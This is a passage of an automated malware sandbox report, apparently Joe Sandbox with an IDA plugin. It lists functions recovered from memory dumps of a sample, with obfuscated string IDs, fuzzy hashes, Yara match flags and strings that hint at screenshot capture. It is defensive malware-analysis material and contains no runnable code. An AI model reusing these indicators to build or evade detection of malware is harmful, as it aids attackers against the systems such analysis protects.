                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0805082D312111482B272514$0E01003A033D22671027310935$133A0B3D023B3D077F1E381500073D$23051C3F142E3B4A2D0F0D$AejdRuGWdHwhHBpojiHLXZdctJmTbHTJ$C:\\$TTigJXObfATJzEhJqRthEtfg$YOIbZlTStQmIyisXUwuDhMCo$eYRcHjMVICOT
                                                                                        • API String ID: 0-1910251389
                                                                                        • Opcode ID: 1412fea7fd68b219246f973ee775f98648e2ec441b39f07382a8c5c8505fd546
                                                                                        • Instruction ID: 74611d4a700befc1d0f59727be61c142d5f13d4dc9215cb5419ad0f8c98db21f
                                                                                        • Opcode Fuzzy Hash: 1412fea7fd68b219246f973ee775f98648e2ec441b39f07382a8c5c8505fd546
                                                                                        • Instruction Fuzzy Hash: 88723C75900218DFDB14DFA4DD88BEEB7B5FB48300F1081A9E50AB72A4DB745A89CF58
                                                                                        Function 0043A3D6 Relevance: 9.0, Strings: 7, Instructions: 281COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0E290A293238$2F2B381801194C2F073C$DC-FG$LsmQtdjbUnLqBfgzgkwVWSG$Pdc$qRocEWKSoHuyol$|Z@
                                                                                        • API String ID: 0-2566575648
                                                                                        • Opcode ID: 8f6c2256be56441cddfbfa09854027db7b803782cc516aa8c762259c5a571aa8
                                                                                        • Instruction ID: c47d5cef9aea6bf71a6e6c6dfba22fbdca85a36b55a91e685923f347d3501174
                                                                                        • Opcode Fuzzy Hash: 8f6c2256be56441cddfbfa09854027db7b803782cc516aa8c762259c5a571aa8
                                                                                        • Instruction Fuzzy Hash: 42C1EA75D002089BDB04DFD0DD98AEEB7B9FF48305F10816AE506BB168EB746A4ACF54
                                                                                        Function 004122D1 Relevance: 8.1, Strings: 6, Instructions: 605COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_412000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1F32083F021A2B181A152110041A6F13161810$l$oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg$t$v$V
                                                                                        • API String ID: 0-698081641
                                                                                        • Opcode ID: ef010a5a574c06ee667d713aa06c90f2cc943b0d9a5ad2edb53dbfe9d4f11361
                                                                                        • Instruction ID: e5ba6e6cb2b699ecc881069874b4a34d11ff7c71a999630db07e31940411210c
                                                                                        • Opcode Fuzzy Hash: ef010a5a574c06ee667d713aa06c90f2cc943b0d9a5ad2edb53dbfe9d4f11361
                                                                                        • Instruction Fuzzy Hash: AD520774A10218DFDB24DF54DE88BDDB7B5BB45300F1081AAE50AA72A0DB745AC9CF58
                                                                                        Function 00404B0E Relevance: 8.0, Strings: 6, Instructions: 546COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 2831160E35193638060D3B19$31006B092E303634171D111D0B$6:@$Add$DXXuZPtFhondFBXdJuouXXNThQaRlZD$MgBEYGSBAexSrsCosGapgabSXuGhmqIQeretgysOxb
                                                                                        • API String ID: 0-2328125236
                                                                                        • Opcode ID: 6762af85e2566faae45fe2a68364e1be8f79c1d1e05c006b37ca557b194920d7
                                                                                        • Instruction ID: 49ec49b14f84469af81b4cf9939fb2becee68a74a7a74a139a31543abeae85ed
                                                                                        • Opcode Fuzzy Hash: 6762af85e2566faae45fe2a68364e1be8f79c1d1e05c006b37ca557b194920d7
                                                                                        • Instruction Fuzzy Hash: E34205B4A00218DFDB14DFA4C988BDDBBB5BF48304F1081AAE54AA7390D7759AC5CF94
                                                                                        Function 0043A001 Relevance: 7.8, Strings: 6, Instructions: 281COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0C3925$0F0F281F03350A$1C191F$OnmybAUJihWWHpfKIzVsEep$iSIAsfFVTHbMefBPJosuMMuqdTaSMjh$iyMFEGGxQQyEzQFmIgEKtXo
                                                                                        • API String ID: 0-3457028134
                                                                                        • Opcode ID: c79757ddc37c021baa731b417516d619a17ef4c8f977e13cd2edd61aa530e786
                                                                                        • Instruction ID: 4a8e1ff2188db3979a0f7ea608edc125c8caddb3416ff259b0a36e3341c9235f
                                                                                        • Opcode Fuzzy Hash: c79757ddc37c021baa731b417516d619a17ef4c8f977e13cd2edd61aa530e786
                                                                                        • Instruction Fuzzy Hash: 40C1D876D00218DFCB05DFD0DD94ADEB7B9BB48304F10816AE506AB164EB746A4ACF64
                                                                                        Function 00425FA0 Relevance: 6.8, Strings: 5, Instructions: 536COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Offset: 00418000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_418000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !@$0805082D312111482B272514$133A0B3D023B3D077F1E381500073D$TTigJXObfATJzEhJqRthEtfg$YOIbZlTStQmIyisXUwuDhMCo
                                                                                        • API String ID: 0-156539605
                                                                                        • Opcode ID: 4e785b8c063fb9096dc6043bb02ea3f0699a8436948af953d7a3b1b6e0d69b26
                                                                                        • Instruction ID: 2e573a8613f2ce7bb868ef27f55f0eeab1b0e692e867d7626a04d8a92fc3ee89
                                                                                        • Opcode Fuzzy Hash: 4e785b8c063fb9096dc6043bb02ea3f0699a8436948af953d7a3b1b6e0d69b26
                                                                                        • Instruction Fuzzy Hash: 0A322C75900218DFDB14DFA4DD88BEDB7B4FB48304F1081A9E50AB7264DB745A89CF58
                                                                                        Function 0043CCB0 Relevance: 6.8, Strings: 5, Instructions: 511COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: #$0$2B102B0F0933427074230A350158222E0459753D193B28082F181D07141319330737$<$lxuGjjGbZTExZ
                                                                                        • API String ID: 0-1391063761
                                                                                        • Opcode ID: 45f024d0b43a25e78e032d8c5e54150ecbba1d3bf90e29081c545657f881721c
                                                                                        • Instruction ID: 6f5c966b5af9debd406b3270939aa39b7b6c5d38376499a2a4a4f1ecbed71953
                                                                                        • Opcode Fuzzy Hash: 45f024d0b43a25e78e032d8c5e54150ecbba1d3bf90e29081c545657f881721c
                                                                                        • Instruction Fuzzy Hash: 2D42F7B5800218DBDB65DF90CD98BDEB7B8BB48304F1085EAE50AB7290DB745B89CF54
                                                                                        Function 00434130 Relevance: 5.8, Strings: 4, Instructions: 756COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • eWatgqGwCCMaqagFyYkPRproVLyeigUgxp, xrefs: 004349BA
                                                                                        • 1B1D1B7B292811305942, xrefs: 00434AA0
                                                                                        • 355740, xrefs: 00434998
                                                                                        • KytuUKIbUovEgoAnvEtEVZIxsIXSxLZy, xrefs: 00434AC2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Offset: 00434000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_434000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1B1D1B7B292811305942$355740$KytuUKIbUovEgoAnvEtEVZIxsIXSxLZy$eWatgqGwCCMaqagFyYkPRproVLyeigUgxp
                                                                                        • API String ID: 0-3178254925
                                                                                        • Opcode ID: 3ab5d0a3484fc42e38941f3a2d7306df5d9f35eca948e549e0b2d0e61310fa22
                                                                                        • Instruction ID: 2b691be2e0690d6671d9331bda473af542c926a30c346bca5f565120d0f94498
                                                                                        • Opcode Fuzzy Hash: 3ab5d0a3484fc42e38941f3a2d7306df5d9f35eca948e549e0b2d0e61310fa22
                                                                                        • Instruction Fuzzy Hash: 99620A74900208EFDB04DF94DA88BDEBBB5FF48705F208169E506B72A0DB796A85CF54
                                                                                        Function 00412670 Relevance: 5.5, Strings: 4, Instructions: 506COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_412000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1F32083F021A2B181A152110041A6F13161810$l$oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg$V
                                                                                        • API String ID: 0-1707604464
                                                                                        • Opcode ID: e59d150365dd472f233061b49891306d6fdedd79a9b5e89ac03b1dff0de763dd
                                                                                        • Instruction ID: edaec51679ca109fb96a51359c0fe490e13ab6089511cab5ae9a5bfd84d3543f
                                                                                        • Opcode Fuzzy Hash: e59d150365dd472f233061b49891306d6fdedd79a9b5e89ac03b1dff0de763dd
                                                                                        • Instruction Fuzzy Hash: 35421874910218CFDB24DF64DE88BDDB7B5BB49300F1081AAE50AB72A0DB745AC9CF59
                                                                                        Function 0041270E Relevance: 5.4, Strings: 4, Instructions: 443COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_412000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1F32083F021A2B181A152110041A6F13161810$l$oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg$V
                                                                                        • API String ID: 0-1707604464
                                                                                        • Opcode ID: 5af31583bc02ed2febc26dce4d1d65830e6fe92041afa15412615c0c62bdb5d7
                                                                                        • Instruction ID: fa752dc590dbe5a3adeba5e8ffd65862ff9d84d8828c21d4cc8f6aaf20fdc491
                                                                                        • Opcode Fuzzy Hash: 5af31583bc02ed2febc26dce4d1d65830e6fe92041afa15412615c0c62bdb5d7
                                                                                        • Instruction Fuzzy Hash: 6322F774A10219DFDB24DF54DE84BEAB7B5BB49300F1081AAE40AB7260DB745EC9CF58
                                                                                        Function 0040EFE0 Relevance: 5.3, Strings: 4, Instructions: 262COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • ZORMlSDSfGqJCV, xrefs: 0040F27F
                                                                                        • OZSsDdFxvhGXMjSvYQkREMxuilBURZcZ, xrefs: 0040F252
                                                                                        • 01103F0D340437373A03057156, xrefs: 0040F20E
                                                                                        • 716C162F1F0D0324083018070B, xrefs: 0040F230
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 01103F0D340437373A03057156$716C162F1F0D0324083018070B$OZSsDdFxvhGXMjSvYQkREMxuilBURZcZ$ZORMlSDSfGqJCV
                                                                                        • API String ID: 0-628392983
                                                                                        • Opcode ID: 21509efe9a0f6f7a26d20719ef6db6ea1a2a2eb38cb80dfc2800af4c955d09c5
                                                                                        • Instruction ID: de01bf6d6d0ded28411f3a8e0d8e3eb8b2e180c36b10da8d4fa967e88739ff1c
                                                                                        • Opcode Fuzzy Hash: 21509efe9a0f6f7a26d20719ef6db6ea1a2a2eb38cb80dfc2800af4c955d09c5
                                                                                        • Instruction Fuzzy Hash: 15C128B5900208DFDB14DFA4D988BDEBBB5FF48304F10816AE506B72A4DB749A49CF64
                                                                                        Function 00416743 Relevance: 4.2, Strings: 3, Instructions: 424COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000416000.00000040.00000400.00020000.00000000.sdmp, Offset: 00416000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_416000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 3920201E271B410D2F1710$EelOyNuaINcq$[
                                                                                        • API String ID: 0-4079878343
                                                                                        • Opcode ID: c4f608610351dff65b74cc9527df3ac34c2448883d2e332549ea1f343169920b
                                                                                        • Instruction ID: 74e1373cd116f377c574244a0469b344cfcc9d41005977f7dbd441c2d2d2b083
                                                                                        • Opcode Fuzzy Hash: c4f608610351dff65b74cc9527df3ac34c2448883d2e332549ea1f343169920b
                                                                                        • Instruction Fuzzy Hash: DA2207B5901229DFDB24DF50CD84BEEB7B5BB48304F1081EAE50AB7290DB746A89CF54
                                                                                        Function 00412872 Relevance: 4.1, Strings: 3, Instructions: 383COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_412000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1F32083F021A2B181A152110041A6F13161810$l$oCvmYcoGlFYNwmtOWwlqnHgtgnUneQjTYjnpjxcwyGDg
                                                                                        • API String ID: 0-3616958960
                                                                                        • Opcode ID: 6b1b8f6f83a0df533027231029633dc0d540c72b0a4b2aae37a41a3f9699a6c6
                                                                                        • Instruction ID: ce8ea732833cc40ccd40573cdf0175db0f0605335fffe3333f267b8a5f7fcc92
                                                                                        • Opcode Fuzzy Hash: 6b1b8f6f83a0df533027231029633dc0d540c72b0a4b2aae37a41a3f9699a6c6
                                                                                        • Instruction Fuzzy Hash: 8912E774A10228DFDB24DF54DD84BEAB7B5BB45300F1081AAE40AB7264DB745AC9CF58
                                                                                        Function 00404ADC Relevance: 4.1, Strings: 3, Instructions: 357COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .BMP$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$\Screenshot
                                                                                        • API String ID: 0-1503909677
                                                                                        • Opcode ID: ad1b7b19d1d8e473fc9ec5e5f76ef31b360be2ce1b013b85b3f6cb39c0b93d93
                                                                                        • Instruction ID: 39ef491234672bccb6445d4411ccaec1867d65a226b334f0d31f0530b0e3d8a3
                                                                                        • Opcode Fuzzy Hash: ad1b7b19d1d8e473fc9ec5e5f76ef31b360be2ce1b013b85b3f6cb39c0b93d93
                                                                                        • Instruction Fuzzy Hash: C1E12D75900608DFDB14DFA4CD48B9EBBB5FB48304F20817AE50AB76A0DB785989CF54
                                                                                        Function 00416002 Relevance: 2.9, Strings: 2, Instructions: 405COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000416000.00000040.00000400.00020000.00000000.sdmp, Offset: 00416000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_416000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: S$l
                                                                                        • API String ID: 0-1918003502
                                                                                        • Opcode ID: 8fea6d9bbfda12fc0cf0834fbee7f4efa2b99862d199e8a1d8d8cca186caaf4b
                                                                                        • Instruction ID: 48a46093829e1761c8ec0b2e17f8dbdbc24295d61107f122dd2443ff2f461447
                                                                                        • Opcode Fuzzy Hash: 8fea6d9bbfda12fc0cf0834fbee7f4efa2b99862d199e8a1d8d8cca186caaf4b
                                                                                        • Instruction Fuzzy Hash: 7D2248B4A01228DFDB24DF54DD88BE9B7B1BB49304F1181AAE50AB7250CB7499C9CF19
                                                                                        Function 00416019 Relevance: 2.9, Strings: 2, Instructions: 368COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000416000.00000040.00000400.00020000.00000000.sdmp, Offset: 00416000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_416000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: S$l
                                                                                        • API String ID: 0-1918003502
                                                                                        • Opcode ID: 72c7d68248c2a9d961bbc32622bdc5b3694159a5a0e3f956009a9f2fcee71e2d
                                                                                        • Instruction ID: 23e47f19514a963bc5911b209416c6f5810d29186aa8c53b3eee5bbd40215cab
                                                                                        • Opcode Fuzzy Hash: 72c7d68248c2a9d961bbc32622bdc5b3694159a5a0e3f956009a9f2fcee71e2d
                                                                                        • Instruction Fuzzy Hash: 160228B4A01228DFDB24CF54DD84BE9B7B1FB89304F1181AAD50AB7290DB7499C9CF19
                                                                                        Function 00438AB8 Relevance: 2.8, Strings: 2, Instructions: 311COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000438000.00000040.00000400.00020000.00000000.sdmp, Offset: 00438000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_438000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0@$ 0@
                                                                                        • API String ID: 0-2967449836
                                                                                        • Opcode ID: 93c254d66db77a7d785f06a0e5d708f4d5584b7fbd2d28d48765b847fd84b272
                                                                                        • Instruction ID: ccfa47edbf4ff97c41d0267c8034ada647e77eaacabeecb469bb76113ad3e3d2
                                                                                        • Opcode Fuzzy Hash: 93c254d66db77a7d785f06a0e5d708f4d5584b7fbd2d28d48765b847fd84b272
                                                                                        • Instruction Fuzzy Hash: 05C10C71900209AFDB04EFA4DD89EEEBBB9EF48704F10845AF601B72A0DB749945CF64
                                                                                        Function 0043A850 Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *.*$Pdc
                                                                                        • API String ID: 0-3601883863
                                                                                        • Opcode ID: dacb328c8890b0d5902f649907d977693ce867fab15d0e31c9193da5a918d7a6
                                                                                        • Instruction ID: 1d657f0ba68818ed9975d0e1893029a9278840dda40db2fcda513d9926c27933
                                                                                        • Opcode Fuzzy Hash: dacb328c8890b0d5902f649907d977693ce867fab15d0e31c9193da5a918d7a6
                                                                                        • Instruction Fuzzy Hash: 87A13F75A40248DFDB04DFA0DA48BEE7BB4FF48701F108169E842F72A4DB749949CB58
                                                                                        Function 00438C60 Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000438000.00000040.00000400.00020000.00000000.sdmp, Offset: 00438000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_438000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0@$ 0@
                                                                                        • API String ID: 0-2967449836
                                                                                        • Opcode ID: 29444823e92766862996c0df46818f52becfe30555634452582dc1f798429e4a
                                                                                        • Instruction ID: a211c1ecdf17853b9804a5476b61874acaa79de5b15ed49f39e712b25193d4ac
                                                                                        • Opcode Fuzzy Hash: 29444823e92766862996c0df46818f52becfe30555634452582dc1f798429e4a
                                                                                        • Instruction Fuzzy Hash: 0D81ED71900209AFDB04EBE4DD85EEEBBBDEF98704F10801AF605B72A0DA745945CF64
                                                                                        Function 0043A844 Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: *.*$Pdc
                                                                                        • API String ID: 0-3601883863
                                                                                        • Opcode ID: de68cdf14547401dff1af7e534092dcd4689a36c709513ad700a7ba3e5cbc573
                                                                                        • Instruction ID: 02737a6f55687ca21cd10f3cb14145f65dc23a83742bdc455a25c7753af0bf70
                                                                                        • Opcode Fuzzy Hash: de68cdf14547401dff1af7e534092dcd4689a36c709513ad700a7ba3e5cbc573
                                                                                        • Instruction Fuzzy Hash: 8A913D75A40248DFDB04DFA4DA48BEE7BB8FF48701F108169E442F72A4DB749A49CB58
                                                                                        Function 0043B310 Relevance: 1.6, Strings: 1, Instructions: 400COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: h1@
                                                                                        • API String ID: 0-151258536
                                                                                        • Opcode ID: 0c6e7b2a1ed47d6d0059d535bff51dab76c49f604482886d017c6d4596c2c0f4
                                                                                        • Instruction ID: 591a8b6f87c20b0df3e7422975b5014c5616fb7a63ba98e19c61efe2e1104965
                                                                                        • Opcode Fuzzy Hash: 0c6e7b2a1ed47d6d0059d535bff51dab76c49f604482886d017c6d4596c2c0f4
                                                                                        • Instruction Fuzzy Hash: E102E4B5A002089FDB14DFA4DD48BDEBBB4FB48301F20816AE946B72A0DB745A49CF54
                                                                                        Function 0043DA50 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 04@
                                                                                        • API String ID: 0-383553253
                                                                                        • Opcode ID: e71607ab56e3932fdee54ce8ca043f9329a59cda185c1dfc8ef29daa7c531e51
                                                                                        • Instruction ID: 4256646007e5f7c9fc31a01e918ab7d8b1d060b35b3da1e25d72f5faff639a27
                                                                                        • Opcode Fuzzy Hash: e71607ab56e3932fdee54ce8ca043f9329a59cda185c1dfc8ef29daa7c531e51
                                                                                        • Instruction Fuzzy Hash: 4BB13B75D00208AFCB04DFA5DD89AEEBBB9EF4C714F10812AF901B7250D774A945CBA8
                                                                                        Function 004383D1 Relevance: 1.5, Strings: 1, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000438000.00000040.00000400.00020000.00000000.sdmp, Offset: 00438000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_438000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: VVULSSfjoivMBiLiukOSh
                                                                                        • API String ID: 0-1605430045
                                                                                        • Opcode ID: b2a3475e8e24c0d1c29afc63b443e9633120890f0cc411fe87bcc67f89e70ea8
                                                                                        • Instruction ID: 1d6974561a10d52ca973a67c872316a2a8e0db5a5fdbe263a3b918b229f1f1a9
                                                                                        • Opcode Fuzzy Hash: b2a3475e8e24c0d1c29afc63b443e9633120890f0cc411fe87bcc67f89e70ea8
                                                                                        • Instruction Fuzzy Hash: EFC1EDB5D002189BDB14DFA5DD84FDEBBB9FF48300F1081AAE20AA7255EB706A45CF54
                                                                                        Function 00404AF4 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_401000_oS6KsQIqJxe038Y.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 7
                                                                                        • API String ID: 0-1790921346
                                                                                        • Opcode ID: b2f1fec38113913f6377540f873c5ecd0b37612807a077ac23c1a0d66f9271e6
                                                                                        • Instruction ID: 34b151677bd56b30fc0d92a8e0d4211d4148b0dc68100d5960f692d51e63c198
                                                                                        • Opcode Fuzzy Hash: b2f1fec38113913f6377540f873c5ecd0b37612807a077ac23c1a0d66f9271e6
                                                                                        • Instruction Fuzzy Hash: 30219070915604EBCB10DF94CA4879DBBB5FF04304F10813EE5057B6A1C7B89A88CF99
                                                                                        Function 00434442 Relevance: .3, Instructions: 254COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Offset: 00434000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_434000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7232d940c0b0d93396f494e0d21cadca6aa2cfcfcdb9eceaa882091f13232d64
                                                                                        • Instruction ID: 924658b52a0dacff9de5144deabc7539157df8758a8e8b78962ddbd6b69b7223
                                                                                        • Opcode Fuzzy Hash: 7232d940c0b0d93396f494e0d21cadca6aa2cfcfcdb9eceaa882091f13232d64
                                                                                        • Instruction Fuzzy Hash: 58B1EA74D00208EBDB04DF94DA88BDDBBB5FF88305F208169E502BB2A4DB75AA45CF54
                                                                                        Function 0043D630 Relevance: .1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.3403613356.000000000043A000.00000040.00000400.00020000.00000000.sdmp, Offset: 0043A000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_43a000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2a5c1b689c71d7373ecba0dad337cb5e37a7766ebea9cefc0f8ea50fd633f88d
                                                                                        • Instruction ID: 2bf1a716b4968093b6e597fed351f3103d88d82440643c3b9990ea7c524e8e4e
